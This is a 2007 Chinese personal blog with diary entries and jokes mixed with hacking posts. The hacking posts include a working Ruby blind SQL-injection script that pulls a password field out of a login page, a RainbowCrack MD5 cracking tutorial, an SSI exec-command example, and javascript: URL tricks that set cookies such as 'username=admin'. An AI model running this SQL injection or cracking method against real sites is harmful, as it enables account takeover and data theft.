2007年12月24日 星期一
[+/-] : [LittleGame] 塔防
2007年12月18日 星期二
[+/-] : Windows 資料夾權限加密解除辦法
標題 Re: 有問題~~
時間 2007/12/15 Sat 19:19:00
如果是權限問題不讓你開的話,解決方法如下:
重新取得資料夾擁有權的方法:
Step 1.
首先,WIN-XP必須是PRO版的,因為PRO版才有支援[安全性]設定
Step 2.
檔案總管,[工具] - [資料夾選項] - [檢視]
[使用簡易檔案共用],把這個項目"取消勾選",按[確定]
Step 3.
再來,於要取得擁有權的資料夾,按滑鼠右鍵選[內容]
會發現多了一個 [安全性] 的設定頁面
Step 4.
[安全性] - [進階]
[從父項繼承套用到子物件的全項項目....],取消打勾,按[套用]
會問,要[複製]還是[移除]?,建議選[複製]
註:他只問我有沒有要移除 我選是
切到[擁有者]頁面,新增本機帳號
例如:Administrator(HOST NAME/Administrator)
底下[取代子物件與容器的擁有者],打勾,按[套用]
Step 5.
OK!大公告成,已經取得該資料夾的所有權限,可以作[完全控制]了
--
※ Origin: 成功大學資訊工程學系[醉資心BBS]
read more
消息來源
[+/-] : [Diary] 我和白痴妹
比電幹麼不用!!!!!
<爆走貞> 說 (上午 12:53):
不是阿
<爆走貞> 說 (上午 12:53):
我是筆電阿!!!!
<爆走貞> 說 (上午 12:53):
我在用筆電阿!
/*mashimaro*/ "A dream makes a team, the team builds the dream!" 說 (上午 12:53):
桌電拉 !!!
其實我是想說桌電XD
惱羞成怒 哈哈
特此一po紀錄一下XD...
read more
2007年12月17日 星期一
[+/-] : [Diary] 天阿!!! 居然抽到Wii !!!
前一陣子看到了國泰世華銀行舉辦的抽獎活動,活動辦法很簡單,只要透過晶片金融卡登入MyBank,就有抽獎的機會。原本只是抱著姑且一試的心用讀卡機登入了網路銀行,漸漸的忘記這回事了。
沒想到在兩三個月後的今天,老媽突然接到銀行打來的電話,說我中大獎了!聰明的老媽馬上反應是詐騙集團要來敲詐,還要對方東西先寄來再說XD,還好銀行有說抽獎的結果也同步公佈在網站上(特別感謝銀行蔡小姐的努力解釋:p),經過老爸老媽Check後,才知道我真的抽到Wii了!!!連平常從來沒傳過簡訊給我的老爸也破天荒的傳訊息過來-"小子,快出來跟老爸看Wii".....XD
read more
消息來源
2007年12月16日 星期日
2007年12月14日 星期五
[+/-] : [Ruby] MySQL Brute Force Attack & [教學]Exploit 21: "SQL-Injection 2"
...
# Author : mashimaro
# Last Modify : 2007/12/11
require 'net/http'
require 'net/https'
host = 'www.host_url.com'
path = '/exploits_path/index2.php?login=user'
cookie = 'PHPSESSID=***********************'
http = Net::HTTP.new(host, 80)
#http.use_ssl = true
headers = {
'Cookie' => cookie,
# 'Referer' => 'http://profil.wp.pl/login.html',
# 'Content-Type' => 'application/x-www-form-urlencoded'
}
cmd = 'password';
appear_str = 'Steven Baker';
len = 0;
if(len > 0)
print 'len = ' + len.to_s;
else
len = 1;
print 'len = 1';
# Step 1. 判斷回傳長度
while(1)
resp, data = http.get(path + '\'%20and%20length(' + cmd + ')>=' + (len + 1).to_s + '--\'',
headers)
break if(!data.index(appear_str));
print 8.chr * len.to_s.length;
len = len + 1;
print len.to_s;
end
end
puts '';
i = 1;
print 'str = ';
# Step 2. 找出字串
while(i <= len) print 80.chr; resp, data = http.get(path + '\'%20and%20ascii(mid(' + cmd + ',' + i.to_s + ',1))>=80--\'',
headers);
if(data.index(appear_str))
min = 80;
max = 127;
else
min = 32;
max = 79;
end
while(min != max)
mid = ((min + max + 1) / 2).to_i;
print 8.chr;
print mid.chr;
str = ' [' + min.to_s + ' ' + mid.to_s + ' ' + max.to_s + ']';
print str;
resp, data = http.get(path + '\'%20and%20ascii(mid(' + cmd + ',' + i.to_s + ',1))>=' +
mid.to_s + '--\'', headers);
if(data.index(appear_str))
min = mid;
else
max = mid - 1;
end
if(min > max)
puts 'error: min > max';
exit(0);
end
print (8.chr) * str.length + ' ' * str.length + (8.chr) * str.length;
end
print 8.chr + min.chr;
i = i + 1;
end
puts "\r\n\r\n" + 'sql brute force search done!!';
read more
2007年12月13日 星期四
2007年12月10日 星期一
[+/-] : [Perl] 開讀檔
[+/-] : [Hacker] RainbowCrack
它不僅能夠破解windows密碼,
同時也是雜亂算法加密的破解利器。
比如可以破解im,md5,sha1,customizable等
其它的加密方式破解也可以很容易地添加到該軟件中。
軟件同時支持windows和linux系統
而且在一個系統上生成的表單可以直接轉換到另一種系統上使用
用它來破解md5密碼,數分鐘即可讓十位數內與字符密碼還原,
它的功能雖然強大,但是在使用時卻是比較複雜的,因此我要詳細的介紹一番
第一步:
生成表單文件
下載來的軟件壓縮包中有幾個執行程序,。
我們在破解md5密碼時,要用到的是前兩個可執行文件,是rcrack.exe rtgen.exe
其中的"rtgen.exe"程序就是用來生成包含預設密碼表單文件的
表單文件中有許多大量的md5加密密文,rainbowcrack的原理不是暴力破解
而是通過查詢預先做好的密碼與密文一一對應的文件來快速破解密。優點是速度快,
缺點是生成的文件非常大,
在命令提示符窗口中,運行"rtgen.exe"命令
也可以輸入cmd在那裡面,找到,你解壓縮文件的路徑,然後運行
由於rainbowcrack是一個多功能的密碼破解器,因此提示信息比較複雜,
我們只需破解md5密碼,在這裡可以按下面的格式生成md5密碼表單:
"rtgen md5 byte 1 7 5 2400 40000 all";
命令執行後,提示"generateing...."正在生成密碼文件
其中"md5"參數指定生成md5表單。
如果是破解windows密碼之類的,還可以使用相應的"lm/sha1"參數
詳細的,可以看幫助文件。
"byte"參數用來指定生成密碼表單中所包含的明密類型為所有字符和數字
如果想破解的是純數字密碼或是純字符密碼。
可以將其改為相應的"numeric"或"alpha"參數
具體的參數可見目錄下"charset.txt"文件
其中1和7分別代表密碼最小和最大長度
2400代表每個表單文件中密碼串的長度
數字5用來表示生成表單文件的數目
而40000則代表每個表單文件中的密碼數目
後面這兩個數目越大,生成表單文件的速度越慢
但是表單文件中的密碼就越多。
相應的破解速度也會越快
命令執行後,提示"generateing...."正在生成密碼文件
執行完畢後。就會在當前目錄下生成5個文件名類似為"md5_byte#1-7_5_2004X40000_all.rt"的文件
其中"all"是我們剛才在生成命令中指定用來添加標識文件的參數
有點慢.我們先繼續(這是剛才生成的表單文件)
第二步:
瞬間破解密碼
生成密碼表單文件後,就可以利用"rcrack.exe"文件來查詢表單文件,
快速破解出指定的密碼了。
直接執行命令後,即可看到程序使用幫助
從幫助信息中,我們可以看到能對單個md5密文件進行破解
也可以一次破解多個密文。
當我們要破解單個md5密碼時,可以使用"-h"參數來指定要破解的密文,
假設這裡要破解密文為"49ba59abbe56e057"可以輸入如下命令
"rcrack *.rt -h 49ba59abbe56e057";
其中"*.rt"參數表示查詢當前目錄下所有密碼表單文件。
如果密碼表單文件製作 得好
命令執行後很快就可以從這些表單文件中找到要還原後的密碼明文了
如果要一次破解多個密碼。首先打開記事本。
將所有待破解的密碼按行輸入
保存為一個沒有後綴的文件中。
這裡文件名為"mima"然後執行命令:
"rcrack *.rt -l mama";
程序將會查詢所有的表單文件,並將其與待破解密碼文件中的密文一一對比,很快就可以將大部分的密碼破
解出來了
提示一下:rainbowcrack軟件可以說是md5密碼的剋星。我們完全可以在平時電腦不工作時,利用相當長的時間來生成個比較大的密碼表單文件庫...
read more
[+/-] : [Hacker] SHTML - SSI 技術
使用SSI (Server Side Include)技術
想要找到既富有創意的平面設計人員,又有腳本開發經驗的人員,實在是太難了。而如果一個百分之百的頁面都是php腳本的網站,將為頁面維護帶來非常大的困難。而且使用了php的自動加頭和加尾的方法,使得幾乎所有頁面都是語義不完整的,不能借助任何一款頁面設計工具工作,是另一個弊病。
利用SSI技術,可以有效的將HTML網頁和CGI腳本邏輯上分開,也可以將重複的HTML元素抽象和獨立出來,減輕維護負擔。
Basic SSI directives Syntax
<!--#element attribute=value attribute=value ... -->
插入程式碼
<!--#exec cmd="ls"-->
Today's date
<!--#config timefmt="%Y/%m/%d %a %H:%M:%S" -->
Today is <!--#echo var="DATE_LOCAL" -->
*
Modification date of the file
This document last modified <!--#flastmod file="index.html" -->
*
Including the results of a CGI program
<!--#include virtual="/cgi-bin/counter.pl" -->
<!--#include virtual="/cgi-bin/example.cgi?argument=value" -->
You can use "#exec cgi=" directive, but it can be disabled using the IncludesNOEXEC Option.
*
Including a standard footer
<!--#include virtual="/footer.html" -->
*
Executing commands
<!--#exec cmd="ls" -->
This feature is dangerous. You can allow SSI, but not the exec feature, with the IncludesNOEXEC argument to the Options directive.
*
Setting variables
<!--#set var="modified" value="$LAST_MODIFIED" -->
<!--#set var="date" value="${DATE_LOCAL}_${DATE_GMT}" -->
*
Conditional expressions
<!--#if expr="test_condition" -->
<!--#elif expr="test_condition" -->
<!--#else -->
<!--#endif -->
1、Config命令
Config命令主要用於修改SSI的默認設置。其中:
Errmsg:設置默認錯誤信息。為了能夠正常的返回用戶設定的錯誤信息,在HTML文件中Errmsg參數必須被放置在其它SSI命令的前面,否則客戶端只能顯示默認的錯誤信息,而不是由用戶設定的自定義信息。
<!--#config errmsg="Error! Please email webmaster@mydomain.com -->
Timefmt:定義日期和時間的使用格式。Timefmt參數必須在echo命令之前使用。
<!--#config timefmt="%A, %B %d, %Y"-->
<!--#echo var="LAST_MODIFIED" -->
顯示結果為:
Wednesday, April 12, 2000
也許用戶對上例中所使用的%A %B %d感到很陌生,下面我們就以表格的形式總結一下SSI中較為常用的一些日期和時間格式。 www.domain.com
Sizefmt:決定文件大小是以字節、千字節還是兆字節為單位表示。如果以字節為單位,參數值為"bytes";對於千字節和兆字節可以使用縮寫形式。同樣,sizefmt參數必須放在fsize命令的前面才能使用。
<!--#config sizefmt="bytes" -->
<!--#fsize file="index.html" -->
2、Include命令
Include命令可以把其它文檔中的文字或圖片插入到當前被解析的文檔中,這是整個SSI的關鍵所在。通過Include命令只需要改動一個文件就可以瞬間更新整個站點!
Include命令具有兩個不同的參數:
Virtual:給出到服務器端某個文檔的虛擬路徑。例如:
<!--#include virtual="/includes/header.html" -->
File:給出到當前目錄的相對路徑,其中不能使用"../",也不能使用絕對路徑。例如:
<!--#include file="header.html" -->
這就要求每一個目錄中都包含一個header.html文件。
3、Echo命令
Echo命令可以顯示以下各環境變量:
DOCUMENT_NAME:顯示當前文檔的名稱。
<!--#echo var="DOCUMENT_NAME" -->
顯示結果為:
index.html
DOCUMENT_URI:顯示當前文檔的虛擬路徑。例如:
<!--#echo var="DOCUMENT_URI" -->
顯示結果為:
/YourDirectory/YourFilename.html
隨著網站的不斷發展,那些越來越長的URL地址肯定會讓人頭疼。如果使用SSI,一切就會迎刃而解。
另外一個關於apache中ssi技術的教程可以查閱:
Apache指南:服務器端包含入門
http://www.kreny.com/doc/apache2.0/howto/ssi.html
參考網頁
http://www.worldhello.net/doc/website_howto/ssi.html
http://www.7880.com/Info/Article-2f11dda0.html
http://www.carleton.ca/~dmcfet/html/ssi.html
http://www.dizign.de/ssi/...
read more
2007年12月8日 星期六
[+/-] : [Hacker] 常用脫殼工具
1、文件分析工具(偵測殼的類型):Fi,GetTyp,peid,pe-scan
2、OEP入口查找工具:SoftICE,TRW,ollydbg,loader,peid
3、dump工具:IceDump,TRW,PEditor,ProcDump32,LordPE
4、PE文件編輯工具:PEditor,ProcDump32,LordPE
5、重建Import Table工具:ImportREC,ReVirgin
6、ASProtect脫殼專用工具:Caspr(ASPr V1.1-V1.2有效),Rad(只對ASPr V1.1有效),loader,peid
##CONTINUE##
(1)Aspack: 用的最多,但只要用UNASPACK或PEDUMP32脫殼就行了。
(2)ASProtect + aspack:次之,國外的軟件多用它加殼,脫殼時需要用到SOFTICE+ICEDUMP,需要一定的專業知識。
(3)Upx: 可以用UPX本身來脫殼,但要注意版本是否一致,用-D 參數
(4)Armadill: 可以用SOFTICE+ICEDUMP脫殼,比較煩
(5)Dbpe: 國內比較好的加密軟件,新版本暫時不能脫,但可以破解
(6)NeoLite: 可以用自己來脫殼
(7)Pcguard: 可以用SOFTICE+ICEDUMP+FROGICE來脫殼
(8)Pecompat: 用SOFTICE配合PEDUMP32來脫殼,但不要專業知識
(9)Petite: 有一部分的老版本可以用PEDUMP32直接脫殼,新版本脫殼時需要用到SOFTICE+ICEDUMP,需要一定的專業知識
(10)WWpack32: 和PECOMPACT一樣其實有一部分的老版本可以用PEDUMP32直接脫殼,不過有時候資源無法修改,也就無法漢化,所以最好還是用SOFTICE配合 PEDUMP32脫殼
常見的殼脫法:
(一)aspack殼 脫殼可用unaspack或caspr 1.unaspack ,執行後選取待脫殼的軟體即可。 缺點:只能脫aspack早些時候版本的殼,不能脫高版本的殼 。
(二)upx殼 脫殼可用upx待脫殼的軟體(如aa.exe)和upx.exe位於同一目錄下,執行windows 開始功能表的執行,輸入upx -d aa.exe。
(三)PEcompact殼 脫殼用unpecompact ,執行後選取待脫殼的軟體即可。
(四)procdump 萬能脫殼但不精,一般很少用。使用方法:運行後,先指定殼的名稱,再選定欲脫殼軟件,確定即可脫殼後的檔大於原文件由於脫殼軟件很成熟,手動脫殼一般用不到。
...read more
[+/-] : [JavaScript] 從瀏覽器網址列直接設定
javascript:document.cookie="username=admin;"
[alert]
javascript:alert(X)
X = function name | variable
[show on the browser]
javascript:X
javascript:alert(document.forms[0].userid.value)
javascript:void(document.forms[0].userid.value="2")
Cookies - document.cookie
Regular Fields - document.forms[0].name.value
Selections - document.forms[0].name.options[0].value...
read more
2007年12月4日 星期二
2007年12月3日 星期一
[+/-] : [Perl] postHTMLsock
...
# 使用 IO::Socket 模組
use IO::Socket;
# 用法 postHTMLsock(URL, post_data, other_request)
# ex. postHTMLsock("http://www.google.com", "view=Help", "Cookie: this-is-cookie\r\n");
sub postHTMLsock
{
$url = $_[0];
$post_data = $_[1];
$other_req = $_[2];
if($url && $post_data) {
# 比對網頁位址是否合乎格式?
($host, $file) = $url =~ m!http://([^/]+)(/[^\#]*)!;
# 若比對正確,才抓取
if ($host) {
# 產生一個 IO::Socket::INET 物件
$socket = IO::Socket::INET->new(
PeerAddr => $host, # 指定主機位址
PeerPort => 'http(80)' # 指定 port 號
);
# 針對 $socket 寫入,此動作形同對 $host 主機提出網頁檔 $file 的要求
print $socket "POST $file HTTP/1.1\r\n";
if($other_req) {
print $socket "$other_req";
}
print $socket "Host: $host\r\n\r\n";
print $socket $post_data;
$socket;
}
else {NULL;}
}
else {NULL;}
}
read more
[+/-] : [Perl] getHTMLsock
...
# 使用 IO::Socket 模組
use IO::Socket;
# 用法 getHTMLsock(URL, other_request)
# ex. getHTMLsock("http://www.google.com", "Cookie: this-is-cookie\r\n");
sub getHTMLsock
{
$url = $_[0];
$other_req = $_[1];
if($url) {
# 比對網頁位址是否合乎格式?
($host, $file) = $url =~ m!http://([^/]+)(/[^\#]*)!;
# 若比對正確,才抓取
if ($host) {
# 產生一個 IO::Socket::INET 物件
$socket = IO::Socket::INET->new(
PeerAddr => $host, # 指定主機位址
PeerPort => 'http(80)' # 指定 port 號
);
# 針對 $socket 寫入,此動作形同對 $host 主機提出網頁檔 $file 的要求
print $socket "GET $file HTTP/1.1\r\n";
if($other_req) {
print $socket "$other_req";
}
print $socket "Host: $host\r\n\r\n";
$socket;
}
else {NULL;}
}
else {NULL;}
}
read more
[+/-] : [Format]GIF
[+/-] : [Format]PNG
...
[ 8 bytes ]
89 50 4D 47 0D 0A 1A 0A
89 "P N G \r \n 空 \n"
[ 4 bytes ][ 4 bytes ]
00 00 00 0D 49 48 44 52
00 00 00 0D "I H D R"
[ 4 bytes ][ 4 bytes ][ 5 bytes ]
width height bitDepth/colorType/compressionMethod/filterMethod/interlaceMethod
{
[ 4 bytes ][ 4 bytes ]
data length chunk type
[ n bytes chunk data ...]
chunk data
[ 4 bytes ]
CRC for chunk data
}*
[ 4 bytes ][ 4 bytes ][ 4 bytes ]
00 00 00 00 49 45 4E 44 AE 42 60 82
00 00 00 00 "I E N D" AE 42 60 82
read more
2007年8月21日 星期二
2007年8月19日 星期日
2007年8月11日 星期六
[+/-] : 高速公路新體驗
吃完午餐跟大家聊了一下天後,小孩子們就跑去二樓無所事事,老妹就建議用筆電看電影。第一部看什麼我已經忘記了,第二部是"邪降",算是一部噁心片,跟恐怖旅社的類型相同。看完我就昏睡過去了= =。一直睡睡睡睡睡,聽說晚上吃蛋糕慶祝的時候,老爸上來叫了我兩次,我完全沒印象Orz,於是,我睡到隔天九點多:$,早餐就是昨天留下來的蛋糕,這樣還算是有慶祝到吧,哈。
在邊吃早餐的時候,外面大風大雨,我還以為颱風來了,聽老爸說才知道原來是西南氣流在搞怪。等風雨小了點後,我們準備上路到台中接老妹,車當然還是我來開拉。在高速公路上,我才真正體驗到什麼叫做狂風暴雨,雨刷開到最快還是刷不清楚,能見度非常低,只能大燈霧燈閃黃燈全開來警示後面的車子,有時旁邊車道有車子,水花就毫不留情的濺在擋風玻璃上,瞬間前方的東西完全模糊,而開過積水時車速會大減,如果緊張隨便亂轉方向盤就掰掰了。還好最後有驚無險的到達大阿姨家,不過我停車技術還是很遜,還是靠老爸親自出馬才ok。
在台中吃了麥當勞當中餐,因為阿姨家在趕工作,就沒留下來吃大北京了,那可是每次去台中必吃得餐廳耶XD,於是就啟程回台北了。越往北,風雨就越來越沒那麼大的,甚至還出太陽,雖然如此,老妹還是在車上哇哇叫,說下雨天我開車不安全,我就笑她是沒見過"大風大雨"的人:p。到了台北,媽媽就提議到蘆洲的餐廳吃晚餐,是她公司之前聚餐過的地方,跟大北京蠻像的,就這樣劃下了驚險刺激高速公路之旅的句點。...
read more
2007年8月2日 星期四
[+/-] : [XD] 白爛的英文翻譯
Are you kidding?
[你是凱蒂嗎?]
No, I'm serious!
[不,我是喜瑞斯啦!]
現在考考你/妳的想像力,請將下面的英文句子翻成中文,答案在英文句子的下一行(請反白)
先來一句也蠻常出現的句子...
How old are you?
[怎麼老是你?]
這句往直接音譯的方向去想...
Are you my angel?
[你是馬英九嗎?]
經典翻譯XD
The girl never gives up.
[那女孩從來不給上。]...
read more
2007年7月30日 星期一
[+/-] : What a Surprise !
醒來以後還有點恍神,準備了一下就要趕到lab,沒想到因為這兩天下雨,機車大鎖的鑰匙孔居然被爛泥巴入侵!更慘的是,我還用鑰匙把土硬塞進去T^T,結果鑰匙沒辦法完全進入鎖孔,當然也就打不開大鎖了,真是欲哭無淚。但事情還是得解決,我就先拿出機車裡的水瓶,想說把水往鑰匙孔灌看能不能讓土順勢流出來,如果可以,我就出運了,想著想著,臉上還帶著一抹微笑,我實在太聰明了,哈哈哈哈哈哈...
當然,待濟悶系翁郎修ㄟㄏㄧㄚ逆甘丹(台語),天不從人願,我可愛的鑰匙還是從鎖孔露出了半截亮晃晃的身軀,彷彿在嘲笑著我的無能為力。但是,男人怎麼可以因為這麼點小事就被擊倒呢(吶喊)!我將我畢生所學的絕活-吹、含、吸、舔、扣一一使出,連路邊的小狗都忍不住多瞧了我一眼、還打了個哈欠呢。
正當我改變主意,決定要先踹那隻小狗兩腳,再去機車行找人幫忙時,救星出現了!隔壁影印店老闆看著徬徨無助的我,說道:打不開喔,在鎖孔上油就好了啦。我:...老闆,我的問題比生鏽還嚴重一點Orz。
於是我把我的問題快速跟老闆講了一下。老闆聽完後,二話不說,拿出了他的秘密法寶 --- "澆花器"(囧),強力的水柱瘋狂的往鎖孔進攻,小泥土們只好不情不願的滑了出來,我也就能順利的騎著翹屁股出門了。
特此感謝影印店老闆XD...
read more
2007年7月24日 星期二
[+/-] : [Math] 中國餘數定理
翻成白話文:
x為一整數且x º 2 mod 3,x º 3 mod 5,x º 2 mod 7,求 x 等於多少?
令 n1 = 3, n2 = 5, n3 = 7 ;
令 n = n1 n2 n3 = 105 ;
令 r1 = 2, r2 = 3, r3 = 2;
令 N1 = n/n1 = 35, N2 = n/n2 = 21, N3 =n/n3 = 15;
若 M1N1 º 1 mod n1,則 M1 = 2
若 M2N2 º 1 mod n2,則 M2 = 1
若 M3N3 º 1 mod n3,則 M3 = 1
因此 x = (r1M1N1 + r2M2N2 + r3M3N3) mod n
x = (2*-1*35 + 3*1*21 + 2*1*15 ) mod 105
x = 23
《孫子算經》作者及年代不詳,推測約在西元4、5百年左右。
中國餘數定理在計算機科學中應用相當多,尤其是密碼學及資料壓縮。
是混資訊界的人不得不懂的數學基本知識。
本篇文章由 glCheng's Blog 轉錄,特此感謝。
...
read more
[+/-] : 友達「點亮夢想 陪他成長」公益活動
2007年7月7日 星期六
[+/-] : 光華半日遊
在努力的逛了四小時後(為了找最低價),終於把東西買齊,沒想到停車費居然要160大洋!!那還不如一進光華隨便找一家買了就走T^T
回到家後,因為大阿姨來我家作客,所以就先忙著跟大家聊天,而將買來的東西丟在一邊,沒想到隔天幫舊電腦裝好ASUS N6200顯卡開機,灌完驅動居然就掛點了!害我感到非常不好意思,可是禮拜一要回新竹了,只好跟老爸約好下禮拜周末再到男人的東區一戰!...
read more
2007年7月6日 星期五
[+/-] : Day -1 @ DSNS
歡樂歸歡樂,他們作的題目既實用也還蠻有趣的,學姐是以按鍵習慣來加強登入安全性,利用HMM價格低、準確率高的特性,以大量data來training系統,進而加強判斷的準確度;而學長是做Sensor Network那塊,利用某個Model來設定異常流量的上限值,比其他系統的誤判率來得低,而因為sensor的硬體配備不是那麼的強且sensor數龐大,所以data只能train過一次,再來就以查表方式來加快計算速度。
聽完學長姐的報告後,大家就先做個簡單的自我介紹,感覺實驗室裡的人都蠻好相處的。之後學長姐就開始討論出遊(囧),原來是老師月中會出國一趟,大家想趁這個機會放個假。之後就回lab選了暫時座位跟職務,我選了管server的工作,感覺上可以學到東西也蠻有挑戰性的。
再來就準備回台北摟~本來以為阿羅哈客運禮拜五有專車可以到三重,沒想到已經停開了Q_Q,只好再往清大候車處方向走,我才發現三重&新竹客運在交大也有一站,可是沒車會停下來,因為在清大站就被擠滿了= =,所以只好再多走幾步路搭車,在車上吃著米粉然後睡到台北,第一次跟學長姐接觸的一天就結束了 :)...
read more
[+/-] : [Funny]結婚前.後
< 結婚前> 往↓看:
他:太好了!我期盼的日子終於來臨了!我都等不及了!
她:我可以反悔嗎?
他:不,你甚至想都別想!
她:你愛我嗎?
他:當然!
她:你會背叛我嗎?
他:不會,你怎麼會有這種想法?
她:你可以吻我一下嗎?
他:當然,決不可能只有一下!
她:你有可能打我嗎?
他:永遠不可能!
她:我能相信你嗎?
< 結婚後> 從下往上看↑...
read more
2007年7月5日 星期四
[+/-] : My First Blog!!
read more